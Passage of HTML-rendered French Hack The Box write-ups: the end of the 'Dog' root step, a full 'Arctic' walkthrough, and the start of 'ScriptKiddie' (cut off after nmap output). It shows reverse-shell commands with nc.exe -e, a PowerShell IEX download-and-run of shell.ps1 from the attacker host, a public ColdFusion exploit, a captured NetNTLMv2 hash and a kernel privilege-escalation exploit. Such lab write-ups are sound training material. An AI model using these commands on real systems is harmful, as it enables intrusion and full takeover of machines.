class="line"><span class="cl">johncusack@dog:/var/www/html$ sudo bee php-script index.php </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ℹ Notice: Constant BACKDROP_ROOT already defined </span></span><span class="line"><span class="cl">in include<span class="o">()</span> <span class="o">(</span>line <span class="m">17</span> of /var/www/html/index.php<span class="o">)</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ⚠ Warning: Cannot modify header information - headers already sent by <span class="o">(</span>output started at /backdrop_tool/bee/includes/errors.inc:142<span class="o">)</span> </span></span><span class="line"><span class="cl">in backdrop_goto<span class="o">()</span> <span class="o">(</span>line <span class="m">867</span> of /var/www/html/core/includes/common.inc<span class="o">)</span>. </span></span></code></pre></td></tr></table> </div> </div><p>Après un essais sur le fichier index.php, il n&rsquo;y a plus d&rsquo;erreur ! Il semble bien executer le code dans ce fichier. On peut alors:</p> <ul> <li>modifier un fichier tel que index.php et executer un reverse shell</li> <li>créer un nouveau fichier php avec un code reverse shell</li> </ul> <p>Cependant, nous n&rsquo;avons pas les droits pour modifier/creer des fichiers. Seulement www-data peut le faire. Nous avons accès au compte www-data donc pas de problème. On crée un fichier s.php avec un code pour ouvrir un reverse shell, et ça fonctionne :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">johncusack@dog:/var/www/html$ sudo bee php-script s.php </span></span><span class="line"><span class="cl">johncusack@dog:/var/www/html$ </span></span><span class="line"><span class="cl"> ℹ Notice: Undefined variable: daemon </span></span><span class="line"><span class="cl">in printit<span class="o">()</span> <span class="o">(</span>line <span class="m">184</span> of /var/www/html/s.php<span class="o">)</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Successfully opened reverse shell to 10.10.14.10:1338 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ℹ Notice: Undefined variable: daemon </span></span><span class="line"><span class="cl">in printit<span class="o">()</span> <span class="o">(</span>line <span class="m">184</span> of /var/www/html/s.php<span class="o">)</span>. </span></span></code></pre></td></tr></table> </div> </div><p>On obtient bien un shell en tant que root :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Dog<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">1338</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1338</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.10<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.58<span class="o">]</span> <span class="m">39820</span> </span></span><span class="line"><span class="cl">Linux dog 5.4.0-208-generic <span class="c1">#228-Ubuntu SMP Fri Feb 7 19:41:33 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux</span> </span></span><span class="line"><span class="cl"> 15:29:16 up 18:00, <span class="m">2</span> users, load average: 0.02, 0.05, 0.01 </span></span><span class="line"><span class="cl">USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT </span></span><span class="line"><span class="cl">johncusa pts/2 10.10.14.10 15:19 4.00s 0.16s 0.16s -bash </span></span><span class="line"><span class="cl">johncusa pts/3 10.10.16.2 15:21 35.00s 0.05s 0.05s -bash </span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> </span></span><span class="line"><span class="cl">/bin/sh: 0: can<span class="err">&#39;</span>t access tty<span class="p">;</span> job control turned off </span></span><span class="line"><span class="cl"><span class="c1">## whoami</span> </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="c1">## cat /root/root.txt</span> </span></span><span class="line"><span class="cl">5a2f.....adc2 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/arctic-htb/Sat, 08 Mar 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/arctic-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Arctic cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Arctic</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.11</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="system-infos">System Infos </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Host Name: ARCTIC </span></span><span class="line"><span class="cl">OS Name: Microsoft Windows Server <span class="m">2008</span> R2 Standard </span></span><span class="line"><span class="cl">OS Version: 6.1.7600 N/A Build <span class="m">7600</span> </span></span><span class="line"><span class="cl">OS Manufacturer: Microsoft Corporation </span></span><span class="line"><span class="cl">OS Configuration: Standalone Server </span></span><span class="line"><span class="cl">OS Build Type: Multiprocessor Free </span></span><span class="line"><span class="cl">Registered Owner: Windows User </span></span><span class="line"><span class="cl">Registered Organization: </span></span><span class="line"><span class="cl">Product ID: 55041-507-9857321-84451 </span></span><span class="line"><span class="cl">Original Install Date: 22/3/2017, 11:09:45 ?? </span></span><span class="line"><span class="cl">System Boot Time: 9/3/2025, 4:20:09 ?? </span></span><span class="line"><span class="cl">System Manufacturer: VMware, Inc. </span></span><span class="line"><span class="cl">System Model: VMware Virtual Platform </span></span><span class="line"><span class="cl">System Type: x64-based PC </span></span><span class="line"><span class="cl">Processor<span class="o">(</span>s<span class="o">)</span>: <span class="m">1</span> Processor<span class="o">(</span>s<span class="o">)</span> Installed. </span></span><span class="line"><span class="cl"> <span class="o">[</span>01<span class="o">]</span>: AMD64 Family <span class="m">25</span> Model <span class="m">1</span> Stepping <span class="m">1</span> AuthenticAMD ~2595 Mhz </span></span><span class="line"><span class="cl">BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020 </span></span><span class="line"><span class="cl">Windows Directory: C:<span class="se">\W</span>indows </span></span><span class="line"><span class="cl">System Directory: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32 </span></span><span class="line"><span class="cl">Boot Device: <span class="se">\D</span>evice<span class="se">\H</span>arddiskVolume1 </span></span><span class="line"><span class="cl">System Locale: el<span class="p">;</span>Greek </span></span><span class="line"><span class="cl">Input Locale: en-us<span class="p">;</span>English <span class="o">(</span>United States<span class="o">)</span> </span></span><span class="line"><span class="cl">Time Zone: <span class="o">(</span>UTC+02:00<span class="o">)</span> Athens, Bucharest, Istanbul </span></span><span class="line"><span class="cl">Total Physical Memory: 6.143 MB </span></span><span class="line"><span class="cl">Available Physical Memory: 4.964 MB </span></span><span class="line"><span class="cl">Virtual Memory: Max Size: 12.285 MB </span></span><span class="line"><span class="cl">Virtual Memory: Available: 11.080 MB </span></span><span class="line"><span class="cl">Virtual Memory: In Use: 1.205 MB </span></span><span class="line"><span class="cl">Page File Location<span class="o">(</span>s<span class="o">)</span>: C:<span class="se">\p</span>agefile.sys </span></span><span class="line"><span class="cl">Domain: HTB </span></span><span class="line"><span class="cl">Logon Server: N/A </span></span><span class="line"><span class="cl">Hotfix<span class="o">(</span>s<span class="o">)</span>: N/A </span></span><span class="line"><span class="cl">Network Card<span class="o">(</span>s<span class="o">)</span>: <span class="m">1</span> NIC<span class="o">(</span>s<span class="o">)</span> Installed. </span></span><span class="line"><span class="cl"> <span class="o">[</span>01<span class="o">]</span>: Intel<span class="o">(</span>R<span class="o">)</span> PRO/1000 MT Network Connection </span></span><span class="line"><span class="cl"> Connection Name: Local Area Connection </span></span><span class="line"><span class="cl"> DHCP Enabled: No </span></span><span class="line"><span class="cl"> IP address<span class="o">(</span>es<span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="o">[</span>01<span class="o">]</span>: 10.10.10.11 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -p- 10.10.10.11 </span></span><span class="line"><span class="cl">HTTP -&gt; Port <span class="m">8500</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="adobe-coldfusion-8">Adobe Coldfusion 8 </h3><p>On accède à une page de connexion pour les administrateurs du serveur : http://10.10.10.11:8500/CFIDE/administrator/enter.cfm</p> <p>On note qu&rsquo;il s&rsquo;agit du service Adobe Coldfusion 8. On trouve directement un poc en python sur searchsploit et on obtient un shell sur la machine :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ python3 exploit.py </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Printing some information <span class="k">for</span> debugging... </span></span><span class="line"><span class="cl">lhost: 10.10.14.10 </span></span><span class="line"><span class="cl">lport: <span class="m">1337</span> </span></span><span class="line"><span class="cl">rhost: 10.10.10.11 </span></span><span class="line"><span class="cl">rport: <span class="m">8500</span> </span></span><span class="line"><span class="cl">payload: 097d871e33a84bc8a3ed6002724b19ee.jsp </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Deleting the payload... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Listening <span class="k">for</span> connection... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Executing the payload... </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.10<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.11<span class="o">]</span> <span class="m">49235</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 6.1.7600<span class="o">]</span> </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>c<span class="o">)</span> <span class="m">2009</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\C</span>oldFusion8<span class="se">\r</span>untime<span class="se">\b</span>in&gt; whoami </span></span><span class="line"><span class="cl">arctic<span class="se">\t</span>olis </span></span></code></pre></td></tr></table> </div> </div><h3 id="stabilize-powershell">Stabilize powershell </h3><p>Dans un premier temps, il a fallu obtenir un meilleur cmd.exe car il n&rsquo;était pas stable du tout. Impossible d&rsquo;obtenir directement un powershell (stable ou non). Ensuite, avec ce nouveau cmd.exe stable (grace a un serveur smbshare et un nc.exe), j&rsquo;ai pu utiliser un nouveau revershell pour obtenir un powershell stable a l&rsquo;aide du repo de nishang et de Invoke-TcpXXX.ps1.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Arctic<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ impacket-smbserver share . </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Config file parsed </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Callback added <span class="k">for</span> UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Callback added <span class="k">for</span> UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Config file parsed </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Config file parsed </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Incoming connection <span class="o">(</span>10.10.10.11,49414<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> AUTHENTICATE_MESSAGE <span class="o">(</span>ARCTIC<span class="se">\t</span>olis,ARCTIC<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> User ARCTIC<span class="se">\t</span>olis authenticated successfully </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> tolis::ARCTIC:aaaaaaaaaaaaaaaa:c542f5a7a35d08fb97440dcae060b508:01010000000000000079e8fa958fdb0199d3a7cce7b544db00000000010010004a00550051007500770064006b004300030010004a00550051007500770064006b00430002001000500073005400480047006e005800440004001000500073005400480047006e0058004400070008000079e8fa958fdb01060004000200000008003000300000000000000000000000003000006d512dfe482ef201bb28a406e85c0fc4005f2cfd87b665b2061df41978469e2b0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003000000000000000000000000000 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Disconnecting Share<span class="o">(</span>1:IPC$<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Disconnecting Share<span class="o">(</span>2:SHARE<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------INITIAL FOOTHOLD CMD.EXE------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\C</span>oldFusion8<span class="se">\r</span>untime<span class="se">\b</span>in&gt;<span class="se">\\</span>10.10.14.10<span class="se">\s</span>hare<span class="se">\n</span>c.exe -e cmd.exe 10.10.14.10 <span class="m">4444</span> </span></span><span class="line"><span class="cl"><span class="se">\\</span>10.10.14.10<span class="se">\s</span>hare<span class="se">\n</span>c.exe -e cmd.exe 10.10.14.10 <span class="m">4444</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-----------NEW CMD.EXE ON PORT 4444----------------- </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Arctic<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">4444</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">4444</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.10<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.11<span class="o">]</span> <span class="m">49435</span> </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 6.1.7600<span class="o">]</span> </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>c<span class="o">)</span> <span class="m">2009</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\C</span>oldFusion8<span class="se">\r</span>untime<span class="se">\b</span>in&gt;<span class="se">\\</span>10.10.14.10<span class="se">\s</span>hare<span class="se">\n</span>c.exe -e powershell.exe 10.10.14.10 <span class="m">5555</span> </span></span><span class="line"><span class="cl"><span class="se">\\</span>10.10.14.10<span class="se">\s</span>hare<span class="se">\n</span>c.exe -e powershell.exe 10.10.14.10 <span class="m">5555</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\C</span>oldFusion8<span class="se">\r</span>untime<span class="se">\b</span>in&gt;powershell.exe IEX<span class="o">(</span>New-Object Net.WebClient<span class="o">)</span>.downloadString<span class="o">(</span><span class="s1">&#39;http://10.10.14.10:8888/shell.ps1&#39;</span><span class="o">)</span> </span></span><span class="line"><span class="cl">powershell.exe IEX<span class="o">(</span>New-Object Net.WebClient<span class="o">)</span>.downloadString<span class="o">(</span><span class="s1">&#39;http://10.10.14.10:8888/shell.ps1&#39;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-----------POWERSHELL ON PORT 1338------------------ </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Arctic<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">1338</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1338</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.10<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.11<span class="o">]</span> <span class="m">49451</span> </span></span><span class="line"><span class="cl">Windows PowerShell running as user tolis on ARCTIC </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> <span class="m">2015</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\C</span>oldFusion8<span class="se">\r</span>untime<span class="se">\b</span>in&gt;whoami </span></span><span class="line"><span class="cl">arctic<span class="se">\t</span>olis </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="kernel-exploit--chimichurriexe">Kernel Exploit : Chimichurri.exe </h3><p>Searching for elevation privilege CVE using &ldquo;wes&rdquo; windows-exploits-suggester.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Arctic<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ wes ./arctic_systeminfo <span class="p">|</span> grep -I <span class="s1">&#39;Elevation of Privilege&#39;</span> -B7 <span class="p">|</span> grep CVE-2010-2554 -A7 -B2 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Date: <span class="m">20100810</span> </span></span><span class="line"><span class="cl">CVE: CVE-2010-2554 </span></span><span class="line"><span class="cl">KB: KB982799 </span></span><span class="line"><span class="cl">Title: Vulnerabilities in the Tracing Feature <span class="k">for</span> Services Could Allow Elevation of Privilege </span></span><span class="line"><span class="cl">Affected product: Windows Server <span class="m">2008</span> R2 <span class="k">for</span> x64-based Systems </span></span><span class="line"><span class="cl">Affected component: </span></span><span class="line"><span class="cl">Severity: Important </span></span><span class="line"><span class="cl">Impact: Elevation of Privilege </span></span><span class="line"><span class="cl">-- </span></span></code></pre></td></tr></table> </div> </div><p>On trouve un github avec un exe deja compilé pour faire l&rsquo;exploit:</p> <blockquote> <p><a class="link" href="https://github.com/egre55/windows-kernel-exploits/blob/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe" target="_blank" rel="noopener" >https://github.com/egre55/windows-kernel-exploits/blob/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe</a></p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\t</span>olis&gt; .<span class="se">\C</span>himichurri.exe </span></span><span class="line"><span class="cl">/Chimichurri/--&gt;This exploit gives you a Local System shell &lt;BR&gt;/Chimichurri/--&gt;Usage: Chimichurri.exe ipaddress port &lt;BR&gt; </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\t</span>olis&gt; .<span class="se">\C</span>himichurri.exe 10.10.14.10 <span class="m">7676</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">--------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Arctic<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">7676</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">7676</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.10<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.11<span class="o">]</span> <span class="m">50748</span> </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 6.1.7600<span class="o">]</span> </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>c<span class="o">)</span> <span class="m">2009</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\t</span>olis&gt;whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">nt authority<span class="se">\s</span>ystem </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\t</span>olis&gt;cd ../Administrator<span class="se">\D</span>esktop </span></span><span class="line"><span class="cl"><span class="nb">cd</span> ../Administrator<span class="se">\D</span>esktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt;type root.txt </span></span><span class="line"><span class="cl"><span class="nb">type</span> root.txt </span></span><span class="line"><span class="cl">8980.....ffb6 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/scriptkiddie-htb/Fri, 07 Mar 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/scriptkiddie-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="ScriptKiddie cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">ScriptKiddie</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.226</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/ScriptKiddie<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -T4 -vvv 10.10.10.226 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">3072</span> 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> 